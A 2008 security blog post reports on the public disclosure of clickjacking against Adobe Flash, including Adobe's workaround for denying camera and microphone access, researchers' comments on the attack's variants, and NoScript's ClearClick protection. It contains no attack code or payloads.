Thursday, October 09, 2008

"Clickjacking" Details Emerge

I wrote about "clickjacking" earlier. While the discoverers had promised to remain mum because the flaw affected an Adobe product (which turned out to be Flash), on Tuesday Israeli researcher Guy Aharonovsky posted a proof-of-concept (PoC) of clickjacking and Flash. Since the cat was already out-of-the-bag, Adobe told the researchers (Robert Hansen and Jeremiah Grossman) to go for it.

Aharonovsky's demonstration used clickjacking tactics to reset Adobe's Flash privacy settings, and turn on the computer's webcam and microphone for remote spying. Serious stuff.

Adobe's already posted an advisory for the issue, though, with a workaround, while promisiing a fix before the end of October.
To prevent this potential issue, customers can change their Flash Player settings as follows:
  1. Access the Global Privacy Settings panel of the Adobe Flash Player Settings Manager at the following URL: http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager02.html
  2. Select the "Always deny" button.
  3. Select ‘Confirm’ in the resulting dialog.
  4. Note that you will no longer be asked to allow or deny camera and / or microphone access after changing this setting. Customers who wish to allow certain sites access to their camera and / or microphone can selectively allow access to certain sites via the Website Privacy Settings panel of the Settings Manager at the following URL: http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager06.html.
Hansen has posted a list of 12 different clickjacking scenarios on his blog. He poked at Aharonovsky somewhat, saying the PoC was a "careless disclosure." He also said:
First of all let me start by saying there are multiple variants of clickjacking. Some of it requires cross domain access, some doesn’t. Some overlays entire pages over a page, some uses iframes to get you to click on one spot. Some require JavaScript, some don’t. Some variants use CSRF to pre-load data in forms, some don’t. Clickjacking does not cover any one of these use cases, but rather all of them. That’s why we had to come up with a new term for it - like the term or not.
Only two of the scenarios have been fixed so far. As I indicated earlier, however, users of Firefox can use the NoScript extension as protection. And the latest releases of the product now include a new feature: ClearClick anti-Clickjacking technology which disables user interaction with partially obstructed or not clearly visible embedded objects.

As I said earlier, it's not an extension I'd ask the general public to use, but for those who are willing to put up with the extra work, it's great protection, until the browser developers come up with a proper fix.



No comments: